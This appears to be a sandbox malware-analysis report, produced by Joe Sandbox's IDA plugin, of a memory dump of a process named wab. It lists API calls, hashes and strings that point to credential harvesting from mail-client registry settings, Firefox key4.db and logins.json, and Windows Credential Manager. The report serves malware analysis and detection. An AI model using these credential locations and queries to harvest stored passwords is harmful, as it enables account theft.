                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                • _mbscpy.MSVCRT ref: 00402533
                                • _mbscpy.MSVCRT ref: 004025FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$QueryValuememset
                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                • API String ID: 168965057-606283353
                                • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                APIs
                                • memset.MSVCRT ref: 00402869
                                  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                • _mbscpy.MSVCRT ref: 004028A3
                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                • _mbscpy.MSVCRT ref: 0040297B
                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                • API String ID: 1497257669-167382505
                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                • DeleteObject.GDI32(?), ref: 00401226
                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                • ShowWindow.USER32(00000000), ref: 00401253
                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                • ShowWindow.USER32(00000000), ref: 00401262
                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                • memset.MSVCRT ref: 0040128E
                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                • String ID:
                                • API String ID: 2998058495-0
                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                APIs
                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                • _strcmpi.MSVCRT ref: 0040BE93
                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                • SetFocus.USER32(?,00000000), ref: 0040BECE
                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                • strlen.MSVCRT ref: 0040BEFE
                                • strlen.MSVCRT ref: 0040BF0C
                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                • memset.MSVCRT ref: 0040BFDB
                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                • API String ID: 2303586283-933021314
                                • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                • API String ID: 231171946-2189169393
                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 633282248-1996832678
                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                APIs
                                Strings
                                • , xrefs: 00406834
                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                • key4.db, xrefs: 00406756
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memcmp$memsetstrlen
                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                • API String ID: 3614188050-3983245814
                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 710961058-601624466
                                • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: sprintf$memset$_mbscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 3402215030-3842416460
                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                APIs
                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                  • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                  • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                • strlen.MSVCRT ref: 0040F139
                                • strlen.MSVCRT ref: 0040F147
                                • memset.MSVCRT ref: 0040F187
                                • strlen.MSVCRT ref: 0040F196
                                • strlen.MSVCRT ref: 0040F1A4
                                • memset.MSVCRT ref: 0040F1EA
                                • strlen.MSVCRT ref: 0040F1F9
                                • strlen.MSVCRT ref: 0040F207
                                • _strcmpi.MSVCRT ref: 0040F2B2
                                • _mbscpy.MSVCRT ref: 0040F2CD
                                • _mbscpy.MSVCRT ref: 0040F30E
                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                • API String ID: 1613542760-3138536805
                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                • API String ID: 1012775001-1343505058
                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                APIs
                                • memset.MSVCRT ref: 00444612
                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                • strlen.MSVCRT ref: 0044462E
                                • memset.MSVCRT ref: 00444668
                                • memset.MSVCRT ref: 0044467C
                                • memset.MSVCRT ref: 00444690
                                • memset.MSVCRT ref: 004446B6
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                • memcpy.MSVCRT ref: 004446ED
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                • memcpy.MSVCRT ref: 00444729
                                • memcpy.MSVCRT ref: 0044473B
                                • _mbscpy.MSVCRT ref: 00444812
                                • memcpy.MSVCRT ref: 00444843
                                • memcpy.MSVCRT ref: 00444855
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset$strlen$_mbscpy
                                • String ID: salu
                                • API String ID: 3691931180-4177317985
                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                APIs
                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                • API String ID: 2449869053-232097475
                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                APIs
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • strlen.MSVCRT ref: 00443AD2
                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                • memset.MSVCRT ref: 00443B2E
                                • memset.MSVCRT ref: 00443B4B
                                • _mbscpy.MSVCRT ref: 00443B79
                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                • LocalFree.KERNEL32(?), ref: 00443C23
                                • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                Strings
                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                • Salt, xrefs: 00443BA7
                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                • API String ID: 665470638-2687544566
                                • Opcode ID: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                • Opcode Fuzzy Hash: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                APIs
                                • sprintf.MSVCRT ref: 0040957B
                                • LoadMenuA.USER32(?,?), ref: 00409589
                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                • sprintf.MSVCRT ref: 004095EB
                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                • memset.MSVCRT ref: 0040961C
                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                • String ID: caption$dialog_%d$menu_%d
                                • API String ID: 3259144588-3822380221
                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                APIs
                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                • API String ID: 2449869053-4258758744
                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                APIs
                                • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                • memset.MSVCRT ref: 0040F84A
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                • String ID: Creds$ps:password
                                • API String ID: 551151806-1872227768
                                • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                APIs
                                • wcsstr.MSVCRT ref: 0040426A
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                • _mbscpy.MSVCRT ref: 004042D5
                                • _mbscpy.MSVCRT ref: 004042E8
                                • strchr.MSVCRT ref: 004042F6
                                • strlen.MSVCRT ref: 0040430A
                                • sprintf.MSVCRT ref: 0040432B
                                • strchr.MSVCRT ref: 0040433C
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                • String ID: %s@gmail.com$www.google.com
                                • API String ID: 3866421160-4070641962
                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                APIs
                                • _mbscpy.MSVCRT ref: 00409749
                                • _mbscpy.MSVCRT ref: 00409759
                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                • _mbscpy.MSVCRT ref: 004097A1
                                • memset.MSVCRT ref: 004097BD
                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
